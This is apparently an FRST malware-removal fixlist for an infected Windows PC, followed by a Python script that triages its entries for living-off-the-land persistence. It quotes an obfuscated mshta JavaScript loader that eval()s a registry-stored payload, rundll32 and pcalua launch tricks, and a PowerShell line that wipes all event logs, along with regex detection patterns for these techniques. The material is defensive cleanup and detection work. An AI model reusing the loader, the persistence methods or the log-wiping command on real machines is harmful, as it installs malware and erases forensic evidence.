CloseProcesses:
CreateRestorePoint:
AVG (HKLM\...\{67975182-2130-493C-A58F-7C2604B8852A}) (Version: 1.191.1 - AVG Technologies) Hidden
FMW 1 (HKLM\...\{AF4C2E26-9BE2-4813-B1A4-9CA0717374D3}) (Version: 1.203.1 - AVG Technologies) Hidden
HKU\.DEFAULT\Software\Classes\24c67: "C:\Windows\system32\mshta.exe" "javascript:OQW5V8d="KINC8C";sd4=new ActiveXObject("WScript.Shell");zn82MSeY="s456";U1mfQ=sd4.RegRead("HKCU\\software\\xdlnnbhy\\pwis");jc46amn="z6ZQHDF1";eval(U1mfQ);sDjsY81="8wIDm";" <==== ATTENTION
ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ContextMenuHandlers1: [AVG] -> [CC]{472083B1-C522-11CF-8763-00608CC02F24} => -> No File
Task: {052344CC-5F15-494C-AC3C-63703D1F56A6} - System32\Tasks\AVGPCTuneUp_Task_BkGndMaintenance => C:\Program Files (x86)\AVG\AVG PC TuneUp\tuscanx.exe
Task: {090E51E9-DE77-46C4-B863-E7AA85EFCC13} - System32\Tasks\Neaij => C:\PROGRA~1\GROOVE~1\Urugn.bat <==== ATTENTION
Task: {201010CF-7892-45FB-9318-06C99B3843E0} - System32\Tasks\{6CC7AE75-1F51-4A29-B5D6-915D820D259A} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Common Files\Flexflex\uninstall.exe" -c -f "C:\Program Files (x86)\Common Files\Flexflex\uninstall.dat" -a uninstallme 26BACF29-13DA-4C96-9D39-DC28055FAD39 DeviceId=7c2e72e5-4ab7-7370-dd06-78cffe1b09eb BarcodeId=50036003 ChannelId=3 DistributerName=APSFCovus
Task: {22707340-77A8-42EC-B11B-FA3EA2A674E8} - System32\Tasks\Comp Pool2 => C:\Windows\system32\rundll32.exe "C:\Users\Mateusz\AppData\Local\Comp Pool\{15460D1F-D559-48C7-F89C-E41222776F91}\ifhokjm.dll",#1 <==== ATTENTION
Task: {2A16F7C8-3510-40E5-AB45-1EE68699C63D} - System32\Tasks\{4D73C0C0-24C3-4D4A-8B20-FEE6686973C6} => C:\Windows\system32\pcalua.exe -a C:\Users\Mateusz\AppData\Roaming\yoursearching\UninstallManager.exe -c -ptid=face
Task: {2E0E05E2-3A5F-474D-A899-6FA9CA8F028E} - System32\Tasks\{1E479D74-5C87-4F3B-A76E-602FE99B3825} => C:\Windows\system32\pcalua.exe -a E:\setup.exe -d E:\
Task: {322DE7E1-D2EE-4866-9273-D4682BDED373} - System32\Tasks\{D4C5F05F-5983-4FF7-A6DE-91C53DBD469B} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Common Files\Flexflex\uninstall.exe" -c -f "C:\Program Files (x86)\Common Files\Flexflex\uninstall.dat" -a uninstallme 26BACF29-13DA-4C96-9D39-DC28055FAD39 DeviceId=7c2e72e5-4ab7-7370-dd06-78cffe1b09eb BarcodeId=50036003 ChannelId=3 DistributerName=APSFCovus
Task: {34E247B8-4E85-4451-8483-E798F5CB999C} - System32\Tasks\{765DC2F4-E78A-4586-87D3-ECD1397A01BE} => C:\Windows\system32\pcalua.exe -a E:\setup.exe -d E:\
Task: {510D25F7-3DE7-4129-B956-4FBC4EF3C673} - System32\Tasks\AVG EUpdate Task => avgsetupx.exe
Task: {55B74A69-DA09-43F4-88FE-C3FF3C54A4D9} - System32\Tasks\Cizutain Monitor => C:\Program Files (x86)\Porikgerceent\ghugther.exe
Task: {687AB33B-A3BF-4CD8-BC13-FEF03F6FFB3D} - System32\Tasks\{97D07746-D72F-46B9-8476-3B1D7515E414} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\mpck\uninstaller.exe"
Task: {A6B9A418-C4CA-42E8-BCCC-BDD037F9F3B0} - System32\Tasks\{6EF9EC59-F759-44AB-B659-806D3BC869F9} => C:\Windows\system32\pcalua.exe -a "C:\Users\Mateusz\Downloads\Pro Evolution Soccer 2017.RePack\Redist\directx.exe" -d "C:\Users\Mateusz\Downloads\Pro Evolution Soccer 2017.RePack\Redist"
Task: {D3B45A62-CCDD-4866-ACFC-AEBA76155F2E} - System32\Tasks\Vunersharaqeent Mapper => C:\Program Files (x86)\Phodelefufasp\reinik.exe
Task: {EABC7F07-392F-429F-BCC8-F5E36F54DA3A} - System32\Tasks\{EA7655C4-EECF-4E94-977D-B26A75A98EDD} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\IgrzyskaZimowePL\unins000.exe"
Task: {F005A435-757B-4CFF-BFAE-DF6914AF97EF} - System32\Tasks\Drovatystqasp Module => C:\Program Files (x86)\Anisat\notasp.exe
AlternateDataStreams: C:\ProgramData\TEMP:6BE50C2B [464]
AlternateDataStreams: C:\Users\Public\AppData:CSM [480]
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1759047646-105122766-3284860367-1000\...\Run: [Google Chrome] => C:\Users\Mateusz\AppData\Roaming\Google Chrome\nVJCg2.lnk [731 2016-01-14] ()
HKU\S-1-5-18\...\Run: [CUQXLJUMB7RYEH5] => "C:\Program Files\F7AVSBMC1V\F7AVSBMC1.exe"
HKU\S-1-5-18\...\Run: [ULR80VQVMQPRNNC] => "C:\Program Files\OVUTFTGQZ5\OVUTFTGQZ.exe"
HKU\S-1-5-18\...\Run: [TCoSy95gr9.exe] => C:\Program Files\OVUTFTGQZ5\LR80VQVMQPRNNC7EP5PFERM\TCoSy95gr9.exe -r1_1 -r2_1
HKU\S-1-5-18\...\RunOnce: [AXCtfLOgbO.exe] => C:\Program Files\OVUTFTGQZ5\LR80VQVMQPRNNC7EP5PFERM\AXCtfLOgbO.exe 2 0
HKLM\...\Providers\kdlalg08: C:\Program Files (x86)\Vunersharaqeent Mapper\local64spl.dll <==== ATTENTION
ShellExecuteHooks: No Name - {373CE130-2BBD-11E7-B925-64006A5CFC23} - -> No File
ShellExecuteHooks: No Name - {A283152C-2BBD-11E7-BB11-64006A5CFC23} - -> No File
ProxyServer: [S-1-5-21-1759047646-105122766-3284860367-1000] => http=127.0.0.1:8080;https=127.0.0.1:8080
Tcpip\..\Interfaces\{4CC2761F-2022-42D4-B29B-2007AFFB42E0}: [DhcpNameServer] 62.179.1.62 62.179.1.63
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page =
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-1759047646-105122766-3284860367-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIP4NYe17aVLWuxkYK9BNIFBtjCcHTr3C-zRzj-qEa8nS-0KZLSsKnXfAXltRwAfbsK_eucFKtHhecJAuRbJrBEnwg9ovz9c6q3M-tV4oLnrt-GQhqPOyaZjMuBVDyUYqiu39-bbcTtrKnGhJgUfggwO1T5fexDUkJwFRLZ2qHZ6UeTHz5ZHA&q={searchTerms}
HKU\S-1-5-21-1759047646-105122766-3284860367-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%73%6E%61%70%64%6F.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIP4NYe17aVLWuxkYK9BNIFBtjCcHTr3C-zRzj-qEa8nS-0KZLSsKnXfAXltRwAfbsK_eucFKtHhecJAuRbJrBEnwg9YDzRVxwLPHTW9jvt8IrXmzHbsY8ShT0Dnoeu8DnOJDJtGrUSQJrjOOelCfqmWAPD5zOrsgTXm7qWSkp4aHE096tWnv
HKU\S-1-5-21-1759047646-105122766-3284860367-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.komputerswiat.pl/#utm_source=microsoft-word-2007&utm_medium=nasz-downloader&utm_campaign=home-page-set
HKU\S-1-5-21-1759047646-105122766-3284860367-1000\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://www.msn.com/?pc=U453&ocid=U453DHP&osmkt=pl-pl
SearchScopes: HKLM-x32 -> DefaultScope - no value
SearchScopes: HKU\S-1-5-21-1759047646-105122766-3284860367-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?FORM=U453DF&PC=U453&q={searchTerms}&src=IE-SearchBox
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
CHR Profile: C:\Users\Mateusz\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-10-17] <==== ATTENTION
CHR Profile: C:\Users\Mateusz\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2 [2017-10-17] <==== ATTENTION
CHR HKU\.DEFAULT\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [jlcgehabolcakkjhgmgpkagpolbjlhfa] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
S2 avgsvc; No ImagePath
U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-14] (Microsoft Corporation) <==== ATTENTION (No ServiceDLL)
S3 RtlWlanu; No ImagePath
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
S3 GPU-Z; \??\C:\Users\Mateusz\AppData\Local\Temp\GPU-Z.sys [X] <==== ATTENTION
2018-02-11 19:16 - 2018-02-11 19:17 - 000000000 ____D C:\AdwCleaner
2016-06-07 12:11 - 2016-06-07 12:11 - 000000034 _____ () C:\Program Files\Common Files\9E3EC1B1.zq
2016-01-04 14:58 - 2015-11-22 11:51 - 000507904 _____ () C:\Users\Mateusz\AppData\Roaming\10101.exe
C:\Users\Mateusz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Flvto YouTube Downloader.lnk
C:\Users\Mateusz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Uninstall Flvto YouTube Downloader.lnk
C:\Users\Mateusz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Core Temp.lnk
C:\Users\Mateusz\AppData\Local\Comp Pool
C:\Users\Mateusz\AppData\Roaming\Google Chrome\nVJCg2.lnk
C:\Program Files (x86)\Vunersharaqeent Mapper
C:\Program Files\F7AVSBMC1V
C:\Program Files\OVUTFTGQZ5
EmptyTemp:
Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}
CMD: ipconfig /flushdns
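What follows is an added example, not part of the fixlist above and not a feature of FRST: a small Python triage script that runs a handful of rules over FRST-formatted entries and says why each one was flagged, so a reviewer can see at a glance which lines are living-off-the-land persistence (mshta running inline JavaScript, a payload stored in the registry and eval()ed, pcalua.exe used as a launch proxy, rundll32 loading a DLL from AppData, a Run value pointing at a .lnk, a loopback proxy) and which are ordinary software. The sample entries are copied from the fixlist on this page with the long opaque query and script tokens trimmed; the rule names, the wording of the explanations, and the choice to flag every pcalua.exe -a task for review are this script's own assumptions.

```python
"""Triage FRST-style entries for living-off-the-land persistence patterns.

Added example, not part of the fixlist and not an FRST feature.  Each rule is a
regex over one FRST line plus a one-line reason; two helpers pull out the
indicators a responder would want next (the registry value an inline script
reads, and the percent-decoded host of an obfuscated start page).
"""
import re
from urllib.parse import unquote

# Entries copied from the fixlist above (opaque tokens trimmed) - sample input.
SAMPLE_LINES = [
    r'HKU\.DEFAULT\Software\Classes\24c67: "C:\Windows\system32\mshta.exe" "javascript:OQW5V8d="KINC8C";sd4=new ActiveXObject("WScript.Shell");U1mfQ=sd4.RegRead("HKCU\\software\\xdlnnbhy\\pwis");eval(U1mfQ);"',
    r'Task: {22707340-77A8-42EC-B11B-FA3EA2A674E8} - System32\Tasks\Comp Pool2 => C:\Windows\system32\rundll32.exe "C:\Users\Mateusz\AppData\Local\Comp Pool\{15460D1F-D559-48C7-F89C-E41222776F91}\ifhokjm.dll",#1',
    r'Task: {2A16F7C8-3510-40E5-AB45-1EE68699C63D} - System32\Tasks\{4D73C0C0-24C3-4D4A-8B20-FEE6686973C6} => C:\Windows\system32\pcalua.exe -a C:\Users\Mateusz\AppData\Roaming\yoursearching\UninstallManager.exe -c -ptid=face',
    r'Task: {052344CC-5F15-494C-AC3C-63703D1F56A6} - System32\Tasks\AVGPCTuneUp_Task_BkGndMaintenance => C:\Program Files (x86)\AVG\AVG PC TuneUp\tuscanx.exe',
    r'HKU\S-1-5-21-1759047646-105122766-3284860367-1000\...\Run: [Google Chrome] => C:\Users\Mateusz\AppData\Roaming\Google Chrome\nVJCg2.lnk [731 2016-01-14] ()',
    r'ProxyServer: [S-1-5-21-1759047646-105122766-3284860367-1000] => http=127.0.0.1:8080;https=127.0.0.1:8080',
    r'HKU\S-1-5-21-1759047646-105122766-3284860367-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%73%6E%61%70%64%6F.%63%6F%6D/?p=mKO_AwFz',
]

# (rule name, pattern over the whole line, reason) - rule set is this script's assumption.
RULES = [
    ("mshta-javascript", re.compile(r"mshta\.exe.*javascript:", re.I),
     "mshta.exe launching inline JavaScript from a registry handler (fileless loader)"),
    ("registry-stored-payload", re.compile(r"RegRead\(.*\).*eval\(", re.I),
     "script reads code out of the registry and eval()s it"),
    ("pcalua-proxy", re.compile(r"pcalua\.exe\s+-a\b", re.I),
     "Program Compatibility Assistant used as a launch proxy; review the target"),
    ("rundll32-userwritable-dll", re.compile(r"rundll32\.exe.*\\(AppData|Temp)\\.*\.dll", re.I),
     "rundll32 loading a DLL from a user-writable directory"),
    ("run-key-shortcut", re.compile(r"\\Run(Once)?:\s*\[.*\]\s*=>\s*.*\.lnk\b", re.I),
     "Run/RunOnce value that starts a .lnk instead of an executable"),
    ("loopback-proxy", re.compile(r"ProxyServer:.*=127\.0\.0\.1:", re.I),
     "browser traffic forced through a local proxy (interception or ad injection)"),
]

REGREAD = re.compile(r'RegRead\("([^"]+)"\)')
URL_HOST = re.compile(r"hxxps?://([^/\s?]+)", re.I)   # FRST defangs http as hxxp


def registry_payload_key(line):
    """Return the registry value an inline script reads, JS escaping undone, or None."""
    m = REGREAD.search(line)
    return m.group(1).replace("\\\\", "\\") if m else None


def decoded_host(line):
    """Return the host of a defanged URL with percent-encoding removed, or None."""
    m = URL_HOST.search(line)
    return unquote(m.group(1)) if m else None


def triage(line):
    """Return (rule names that fired, follow-up notes) for one FRST entry."""
    hits = [name for name, rx, _ in RULES if rx.search(line)]
    notes = []
    key = registry_payload_key(line)
    if key:
        notes.append(f"payload stored at {key}; make sure the fix removes that key too")
    m = URL_HOST.search(line)
    if m and "%" in m.group(1):
        notes.append(f"percent-encoded host decodes to {unquote(m.group(1))}")
    return hits, notes


def triage_report(lines):
    """Map every entry to its findings; unflagged entries stay in so the reviewer sees them."""
    return {line: triage(line) for line in lines}


if __name__ == "__main__":
    reasons = {name: reason for name, _, reason in RULES}
    for line, (hits, notes) in triage_report(SAMPLE_LINES).items():
        print(f"[{', '.join(hits) if hits else 'no rule matched'}] {line[:90]}")
        for h in hits:
            print(f"    - {reasons[h]}")
        for n in notes:
            print(f"    - {n}")
```

Two things the rules surface that the fixlist alone does not make obvious: the mshta handler's code lives in the registry at HKCU\software\xdlnnbhy\pwis, which the fixlist does not list, so the value should be checked after the handler is removed; and the percent-encoded Start Page decodes to feed.snapdo.com (the Search Page on this system decodes the same way to feed.sonic-search.com). The pcalua.exe rule deliberately fires on benign uninstaller tasks as well, because the whole point of the technique is that the parent process is always signed Microsoft code.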